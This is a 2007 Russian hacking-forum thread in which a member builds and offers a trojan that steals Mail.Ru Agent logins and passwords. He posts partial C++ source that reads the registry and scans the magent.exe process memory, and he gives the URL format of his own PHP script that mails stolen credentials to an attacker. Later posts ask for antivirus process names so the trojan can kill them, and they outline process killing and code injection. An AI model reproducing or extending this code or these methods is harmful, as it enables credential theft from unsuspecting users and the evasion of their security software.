PDA

Просмотр полной версии : Потестите программулю!!!

darkf0x
12.01.2007, 15:07
Хай народ! Я тут новенький (сорри за флуд), но проф. занимаюсь сис. программированием! Увы PHP, Java и подобную хренотень не знаю (да и времени не было изучать), пишу исключительно на Си++ ну и изредко на Delphi....
Ближе к телу! Решил навоять небольшой троянчик для хака magent`a!

Сегодня утром написал сканер дампа сегмента данных MAgenta... Должен выдирать логин и пароль к сей почтовой приблуде! Программуля маленькая, сканит и ищет определенную сигнатуру, при обнаружении сохраняет в файл <C:\magent.pas> все что навыдирала!
Увы может работать достаточно долго, так как механизм не заточен на статический адрес в сегменте данных, а реализованно все в виде перебора памяти процесса magent... Наиболее нормальный механизм, так как адреса не всегда являются статичными и могут меняться от версии MAgenta!
начальные данные для сканинга беруться из реестра, вернее создается сигнатура для поиска, это почтовый адрес и хэш пароля(скорее всего)... Думаю дописать её в виде сервиса который бы после выдирания слал бы всю инфу либо на мыло, или на ICQ , скорее всего оба варианта будут использоваться! Прога у меня работает, на 3 тачилах тестил, и разные количества логинов генерировал.. Нужно потестить правильно ли выдирает пару логин и пароль! Посмотрите плиз! Сразу оговорюсь без всяких подстав и вирей! При тесте можете отрубиться от инета, чтобы не было нехороших мыслей, если все будет удачно, после завершения написания поделюсь!
Собственно сама прога:

[Потёр недоверчивый SladerNon.]

P.S. расширение ExE естесно... Прога сыра, могут быть баги, может провисать проц, так как сканин в цикле...
А вообще жду рецензий!

Ksander
12.01.2007, 15:18
не качайте. возможно на 99% что там трой.имхо

Constantine
12.01.2007, 15:21
Пахнет очень жестким на**ом

Grey
12.01.2007, 15:27
Интересно, а размер в 10 с небольшим килобайт, он писал на делфи или на c++))) и в том и в другом такого размера не добиться.

Программка, которая выводит сообщение на c++ весит килобайт 60, только что проверил.

Mavr
12.01.2007, 15:28
Antivirus Version Update Result
AntiVir 7.3.0.21 01.09.2007 no virus found
Authentium 4.93.8 01.12.2007 no virus found
Avast 4.7.892.0 12.30.2006 no virus found
AVG 386 01.11.2007 no virus found
BitDefender 7.2 01.12.2007 no virus found
CAT-QuickHeal 9.00 01.12.2007 no virus found
ClamAV devel-20060426 01.12.2007 no virus found
DrWeb 4.33 01.12.2007 no virus found
eSafe 7.0.14.0 01.10.2007 suspicious Trojan/Worm
eTrust-InoculateIT 23.73.112 01.12.2007 no virus found
eTrust-Vet 30.3.3319 01.11.2007 no virus found
Ewido 4.0 01.11.2007 no virus found
Fortinet 2.82.0.0 01.12.2007 suspicious
F-Prot 3.16f 01.12.2007 no virus found
F-Prot4 4.2.1.29 01.12.2007 no virus found
Ikarus T3.1.0.27 01.09.2007 no virus found
Kaspersky 4.0.2.24 01.12.2007 no virus found
McAfee 4937 01.11.2007 no virus found
Microsoft 1.1904 01.12.2007 no virus found
NOD32v2 1972 01.11.2007 no virus found
Norman 5.80.02 01.12.2007 no virus found
Panda 9.0.0.4 01.12.2007 no virus found
Prevx1 V2 01.12.2007 no virus found
Sophos 4.13.0 01.11.2007 no virus found
Sunbelt 2.2.907.0 01.12.2007 no virus found
TheHacker 6.0.3.147 01.11.2007 no virus found
UNA 1.83 01.11.2007 no virus found
VBA32 3.11.2 01.12.2007 no virus found
VirusBuster 4.3.19:9 01.11.2007 no virus found

darkf0x
12.01.2007, 15:32
Интересно, а размер в 10 с небольшим килобайт, он писал на делфи или на c++))) и в том и в другом такого размера не добиться.
Ню-ню.... Ты родной программингом занимался когда нить? Слышал про написание программ без MFC! Это раз, а во вторых это не троян 100%, Писалось на Си++... И упаковано UPX`ом.. Мля хакеры.. Ламерством пованивает! =( Если уж в программинге не шарите нах что=то гнать?
Я сказал, что это не троян и ни вирь! Ну как вам докажешь?

Ksander
12.01.2007, 15:34
Я сказал, что это не троян и ни вирь! Ну как вам докажешь?

Мало ли что ты сказал, ты кто вообще такой ?=)
С сегодняйшей регой к тому же.

Лично я таким методом впариваю трои, по этому и не верю.

Grey
12.01.2007, 15:38
Ну ладно, может просто наш новый дружок, захочет поделиться исходничком? а мы уж сами и скомпилируем и запакуем

darkf0x
12.01.2007, 15:46
Ну ладно, может просто наш новый дружок, захочет поделиться исходничком? а мы уж сами и скомпилируем и запакуем
312-625-207

Ci5
12.01.2007, 16:41
Идея рульная. Но верить беспонтово если не видел исходников. Исходники в студию !

darkf0x
12.01.2007, 16:43
Идея рульная. Но верить песпонтово если не видел исходников. Исходники в студию !
Исходники не дам! Могу дать статическую либу и прототип функции, а там сами проект собирайте!

Constantine
12.01.2007, 17:27
Я не верю тебе. ИМХО ты нае**щик, остальное меня не волнует.
Реально таким образом троев впаривают.

darkf0x
12.01.2007, 17:34
Я не верю тебе. ИМХО ты нае**щик, остальное меня не волнует.
Реально таким образом троев впаривают.
Угу.. А рульному хацкеру слабо дизасмом пройтись и проверить, а перед этим распаковать файлик? =) А? Хацкер? Али демагеры (Soft ICe и т.п.) Мы не знаем?

Constantine
12.01.2007, 17:36
Провакация. лол

Ci5
12.01.2007, 17:37
При таком раскладе мона firewall поставить на запрещенный режим для всего и проверить прогу. Файл создается на диске c:\ . Если что, то удалить прогу.

NOmeR1
12.01.2007, 18:01
2аффтар
А сам протестить не можешь?

darkf0x
12.01.2007, 18:10
2аффтар
А сам протестить не можешь?
Ладно забейте... Че орать сразу!

Kaban
12.01.2007, 18:35
верить... не верить... делать мне чтоль нечего... обойдусь и без этой проги.. не велика потеря...

zl0ba
12.01.2007, 18:57
Тестю за 5 wmz!

fucker"ok
12.01.2007, 20:31
Мда. Мембер, который пишет на С++ программы размером 11kb не стал бы орать "запустите плиз!!! Очень надо!"
(имхо)Да и проще перехватить данные пре пересылке (за основу можно взять снифер nerezus'а.) логин\пароль передаются в открытом виде, без всяких хешей (сам знаю, ковырялся в протоколе)

darkf0x
12.01.2007, 20:48
Мда. Мембер, который пишет на С++ программы размером 11kb не стал бы орать "запустите плиз!!! Очень надо!"
(имхо)Да и проще перехватить данные пре пересылке (за основу можно взять снифер nerezus'а.) логин\пароль передаются в открытом виде, без всяких хешей (сам знаю, ковырялся в протоколе)
Вот не надо гнать только! Яж никого не напрягаю.. Повторюсь, прога весит 10 кил, так как запакована UPX кто не знает что это, ваши проблемы. А че говорить! Не суть..

freddi
12.01.2007, 22:15
Я буду тестировать, а то тут все испугались.

insurgent
13.01.2007, 00:16
Я буду тестировать, а то тут все испугались.
ну и как? Работает? Или пароли меняешь=)

darkf0x
13.01.2007, 00:45
ну ты суперпуперпрограммистмега хэцкер, ну не такие мы умные, как ты, ну не знаем мы шо ето такое и чем едят=) просто сам головой, или чем это там, подумай?! Я пишу те: я пипец программер, написал програмульку кот ломает фсе мыльники, скачай!!! и еще проверь как она работает, а то я сам не знаю, как она работает 0_о ню давай исходники кому-нить одному и он проверить, ф чем проблема?)
Лови мега хацкер...
#include <windows.h>
#include <stdio.h>
#include<tlhelp32.h>
//--------------------------------------------
BOOL ParsingMagentDump(BYTE *, int, int);
bool fl_ = 0;
void printf_(char *msg)
{
char tmp[255];
sprintf(tmp,msg);
CharToOem(tmp,tmp);
printf("%s\n",tmp);
}
void write_file(BYTE* b, long i)
{

HANDLE hFile = CreateFile("C:\\magent.pas",
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);

if(hFile != INVALID_HANDLE_VALUE)
{
DWORD ret;

if (!fl_)
{
fl_ = 1;
printf_("Файл C:\\magent.pas создан..");
}

SetFilePointer(hFile, 0, 0, FILE_END);
WriteFile(hFile,&b[0],i,&ret,NULL);
CloseHandle(hFile);
} else
printf_("Ошибка создания или открытия файла C:\\magent.pas..");
}
void start_scanmmemory()
{
HKEY key = 0;

printf_("Берем данные из реестра: Software\\Mail.Ru\\Agent\\mra_logins...");
if(RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Mail.Ru\\Agent\\mra_logins",0,KEY_READ, &key) == ERROR_SUCCESS)
{

char svValueName[MAX_PATH];
memset(&svValueName,0,MAX_PATH);
int count=0;
DWORD cbValueNameLen = MAX_PATH;
DWORD cbValueDataLen = MAX_PATH;
DWORD dwType,pasLen;
char ttt[255];

while(RegEnumValue(key,count,svValueName,&cbValueNameLen,NULL,&dwType,NULL,&cbValueDataLen)!=ERROR_NO_MORE_ITEMS)
{

if (strlen(svValueName) > 0)
{
sprintf(ttt,"Логин : %s",svValueName);
printf_(ttt);

BYTE g[255];
BYTE login[255];
memset(&g,0,255);
memset(&login,0,255);
RegQueryValueEx(key,svValueName,NULL,&dwType,g,&pasLen);

int i = strlen(svValueName);
memcpy(login,&svValueName[0],strlen(svValueName));
memcpy(&login[i],g,4);

sprintf(ttt,"Размер пароля : %d",pasLen-4);
printf_(ttt);

i+=4;

ParsingMagentDump(login, i, pasLen);

}
memset(&svValueName,0,MAX_PATH);
cbValueNameLen = MAX_PATH;
cbValueDataLen = MAX_PATH;
count++;
}

if (count == 0)
printf_("Ошибка! Не удалось взять данные из реестра: Software\\Mail.Ru\\Agent\\mra_logins...");
RegCloseKey(key);
} else
printf_("Ошибка! Не удалось взять данные из реестра: Software\\Mail.Ru\\Agent\\mra_logins...");

}
BOOL ParsingMagentDump(BYTE * login, int ls, int ps)
{

printf_("Сканим список процессов, ищем magent.exe...");
HANDLE hProcessSnap;
PROCESSENTRY32 pe32;
HANDLE hProcess = 0;
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

if(hProcessSnap == INVALID_HANDLE_VALUE) return false;
// .......................
// Посмотрели и хватит!!!!

}

offset++;

if (offset > (0x800000) || fl) break;
}

} else
printf_("Не удалось найти процесс Magent.exe в списке процессов...");

CloseHandle(hProcessSnap);

return fl;
}
int main(int argc, char* argv[])
{
start_scanmmemory();
printf_("Работа закончена!");
return 0;
}

asm33
13.01.2007, 03:14
ну ппц. Взяди бы и на виртуальной тачке бы запустили эту хрень, если боитесь))))

Ci5
13.01.2007, 15:00
ну ты суперпуперпрограммистмега хэцкер, ну не такие мы умные, как ты, ну не знаем мы шо ето такое и чем едят=) просто сам головой, или чем это там, подумай?! Я пишу те: я пипец программер, написал програмульку кот ломает фсе мыльники, скачай!!! и еще проверь как она работает, а то я сам не знаю, как она работает 0_о ню давай исходники кому-нить одному и он проверить, ф чем проблема?)

Если ты не шаришь в программировании, то лучше помолчи и не делай свои выводы "правильные", КУЛЦ МЕГА ХАЦКЕР И ПРОГРАММЕР. И как те сказали - харошь флудить.

2 darkf0x - ты решил траблу с записью всего процесса в файл ? И вообще, когда тя мона в ICQ найти ?

darkf0x
13.01.2007, 15:52
ПЕСДОС, если ты не шаришь в программировании, то лучше помолчи и не делай свои выводы "правильные", КУЛЦ МЕГА ХАЦКЕР И ПРОГРАММЕР. И как те сказали - харошь флудить.

2 darkf0x - ты решил траблу с записью всего процесса в файл ? И вообще, когда тя мона в ICQ найти ?
В будние дни постоянно.. В выходные изредка! =( Проблемы решил! Оказалось все тривиально! Хотя мне не нравится скорость перебора памяти.. Сейчас прикидываю как сразу вычислить относительный адрес сегмента, без тупого брута! =( Мыслишки есть! А так если есть желание пишите на dark_f0x@mail.ru или anclave2007@yandex.ru
Есть интересные мысли! Кстати эту "уязвимость" можно использовать для Фэйков! Народ пользуется почтовыми агентами, если официально всплывет, что он хачится просто, тогда можно фейки делать, типа заплаток от этой уязвимости! =) Ну а там все ограничивается фантазией хакера! Ну да ладно стучите кому интересно! Могу писать что угодно! =) Если грамотно поставите задачу можно написать прикольные трояные!
Программингом даавно занимаюсь и работаю программером... Пишу от сервисов до мультипотоковых приложений, от сокетовых приложений до прог под покеты...
P.S. Многие скептически отнеслись к моим постам, я понимаю, хотя не хотел ни кого пресаннуть!

devil2007
13.01.2007, 18:36
lascer private 8.5 орёт что троянский червь

_Great_
13.01.2007, 18:42
А мне не нравится пост. Я поставлю -2

freddi
13.01.2007, 19:28
darkf0x Маладец!
Все работает, в инет не лезет(те пароли ващи не отправляет никому), пароль от агента нашол, но у меня стояла галочка его сохранить. Довольно быстро, гдето за 1 минуту.

Так что уберите минус у него!!!!

darkf0x
13.01.2007, 19:45
darkf0x Маладец!
Все работает, в инет не лезет(те пароли ващи не отправляет никому), пароль от агента нашол, но у меня стояла галочка его сохранить. Довольно быстро, гдето за 1 минуту.

Так что уберите минус у него!!!!
А ладно... Забейте ребята... Каму интересна идея, допишу прогу тому дам заюзать... И Исходники..
По поводу троянских червей: По всей видимостри эвристика работает у этого антивиря сильно но глючно... Имхо проги имеющие в коде функции перебора и открытия левых процессов, а также чтение из них данных считать за трояны... Как-то... Хер знает.. логика понятна, но не всегда правильна!

freddi
13.01.2007, 19:48
У меня касперский не запалил ничего, и аутпост тоже.

darkf0x
13.01.2007, 19:59
У меня касперский не запалил ничего, и аутпост тоже.
на самом деле довольно долго память сканин и проц провешивает... Сейчас решу эту проблему и отвяжу от галки сохранять пароль (вернее от данных из реестра)!
Думаю брутить по другому алгоритму! А то народ не всегда галку ставит...

darkf0x
13.01.2007, 21:22
Сейчас готов скрипт работающий на левом хосте и отправляющий через урл логин и пароль на нужный ящик.. =) Так что скора будет релиз проги и скрипта обслуживающего прогу!

Ci5
14.01.2007, 10:38
Логин и пароль у меня нашел исправно. Кароч, идея хорошая, хоть и узко применимая, но все равно +.

darkf0x
14.01.2007, 11:26
Логин и пароль у меня нашел исправно. Кароч, идея хорошая, хоть и узко применимая, но все равно +.
Согласен... Узкая, но для меня начинающего, надеюсь будет отправной точкой в мир хакерства! =)

Так на сегодняшний день уже:
1. Прога не привязана к реестру (не обязательно ставить галку сохранить пароль)
2. Поиск и парсинг происходит на-а-амного быстрее: (вычисление адреса PE заголовка в памяти + смещение к сегменту данных (размер проги)) Вычисление абсолютного адреса не получилось, имхо файл у них запакован UPX, соответственно PE не совсем тот что нужен мне.. =( Ну и хер с ним.. =) Мы тоже не лыком шиты!
Приблизительный адрес все равно вычисляем! Единственное чтобы вычислить адрес PE хидера, пришлось создавать поток в процессе жертве... Нормальные Антивири на такое могут заорать! =( Но без такого выкрутаса не получить правильного адреса PE хидера MAgenta...
3. Написал скрипт на php, лежит на
darkanclave.hut2.ru - примитив, но исправно должен отправлять пару параметров на указанную почту!
Вызывает так:
darkanclave.hut2.ru/getaccount.php?l=<param1>&p=<param2>&mail=<Ваша почта>
сейчас затачиваю прогу под него! Чтобы скрыто отправляла все что выдрала через этот URL...

Кому интересно новая(скоростная) тестовая версия (без отправки и с выводом лога) лежит: anclave2007.narod.ru/mh.ex

Rayne
21.01.2007, 17:11
Заранее извеняюсь, если что-то не увидел, или просмотрел, но к проге есть мануал, как ею узать?
Заранее спасибо.
ПС автору спасибо за прогу

Ci5
21.01.2007, 17:26
Прога еще в разработке. Жди пока он ее закончит.

wano81
21.01.2007, 18:37
Заранее извеняюсь, если что-то не увидел, или просмотрел, но к проге есть мануал, как ею узать?
Заранее спасибо.
ПС автору спасибо за прогу

там не нужен мануал просто отправляешь фаил и потом ловишь пасс
но чесно сказать неизвестно выложиться прога в паблик или нет потому как обидели человека очень сильно!

darkf0x
24.01.2007, 12:14
там не нужен мануал просто отправляешь фаил и потом ловишь пасс
но чесно сказать неизвестно выложиться прога в паблик или нет потому как обидели человека очень сильно!
Ну... Уж не так сильно, так немножко подобосрали.. =)
Короче народ! Программа почти написана, находится в стадии тестирования и разработки механизма интеграции вредоносного кода в левые процессы... Если не сложно!
Киньте названия процессов всех антивирей и файеров что вам встречались или которые вы юзаете!
Например:
outpost.exe
и т.п.
Это нужно для троя, он будет гасить это дерьмо в памяти
перед своей интеграцией в чужой процесс имхо эти пакостные помошники жизни юзверей перехватывают API вызовы, и блокируют интеграцию.. Чтобы этого не было их нужно замочить... Механизм собственного перехвата API не удобен, имхо после этого трой начинает плохо сосуществовать с антивирями и файерволами! =( Кто юзал к примеру OutpoSt и каспера одновременно на одной тачиле знают, что может быть полная жопа! Поэтому самы простой способ, вырубаем это дерьмо из памяти, интегрируемся, пускай юзер запускает заново... =)

da_ff
30.01.2007, 04:00
вопрос как ты завершаешь сервис к примеру каспера? он помоему так просто не сдается (покрайней мере у меня не сдавался) на какой версии каспера тестишь? можешь дать кусок кода?
еще не по теме кто нибудь может показать как импортировать функцию из obj файла на с++? на делфи знаю и вот с с++ проблема и обьявлением.

KEZ
30.01.2007, 10:06
еще не по теме кто нибудь может показать как импортировать функцию из obj файла на с++? на делфи знаю и вот с с++ проблема и обьявлением.

Открой .obj файл блокнотом, найди там функцию и скопируй все ее содержимое в непонятных символах прямо в исходник. С тебя плюсик!

da_ff
30.01.2007, 19:03
у меня еще вопрос а вставлять прямо в ехешник?

~Dala$$~
31.01.2007, 03:08
Можеш попробовать=) в cpp файл есль я правильно понял о чем вы

hsi
31.01.2007, 06:54
Перезалейте бинарник, хочу его погонять.

darkf0x
31.01.2007, 11:25
вопрос как ты завершаешь сервис к примеру каспера? он помоему так просто не сдается (покрайней мере у меня не сдавался) на какой версии каспера тестишь? можешь дать кусок кода?
Не совсем понятно, нах из объектного файла что-то импортировать? Не суть.. Любой процесс валится через:
DbgUiDebugActiveProcess

Перезалейте бинарник, хочу его погонять.
Мля.. Интересно админы narod.ru похерили файлик, или кто-то развлекается?

у меня еще вопрос а вставлять прямо в ехешник?
Функцию вставлять? =) Есть несколько способов: создавать еще одну секцию в PE Header`e, затем модифицировать таблицу импорта, и добавлять свою функцию в exe, но там есть гемморы, нужно знать как правильно вычислять адреса секций + коненчно структуру PE Headera(инфы везде полно), второй способ проще, открываешь процесс, резервируешь в нем память, копируешь туда функцию, и через создание нитки запускаешь свой код в нем! Правда есть вероятность, что антизараза вонять начнет! =)

KREST
31.01.2007, 15:58
че-то не скачиваеться....

darkf0x
31.01.2007, 16:54
че-то не скачиваеться....
Не тупим!!!

anclave2007.narod.ru/mh.ex

da_ff
31.01.2007, 23:33
да не суть я так просто пытался искрометно пошутить (видимо не получилось...)

da_ff
31.01.2007, 23:36
по поводу процесса DbgUiDebugActiveProcess помоему на шестом каспере не прокатит а люди у нас богатые пользуются самым свежим софтом =) а по поводу обжект-файл-исходнник просрал а велосипед изобретать лень...

VaV
01.02.2007, 09:43
по поводу процесса DbgUiDebugActiveProcess помоему на шестом каспере не прокатит а люди у нас богатые пользуются самым свежим софтом =) а по поводу обжект-файл-исходнник просрал а велосипед изобретать лень...

Что ж ты так с исходником то?

darkf0x
01.02.2007, 16:07
DbgUiDebugActiveProcess =) Сомневаюсь что он может перехватить этот вызов... Хотя. Надо бы потестить... Каспера тока найду! А то у нас тут везде Symantec... =)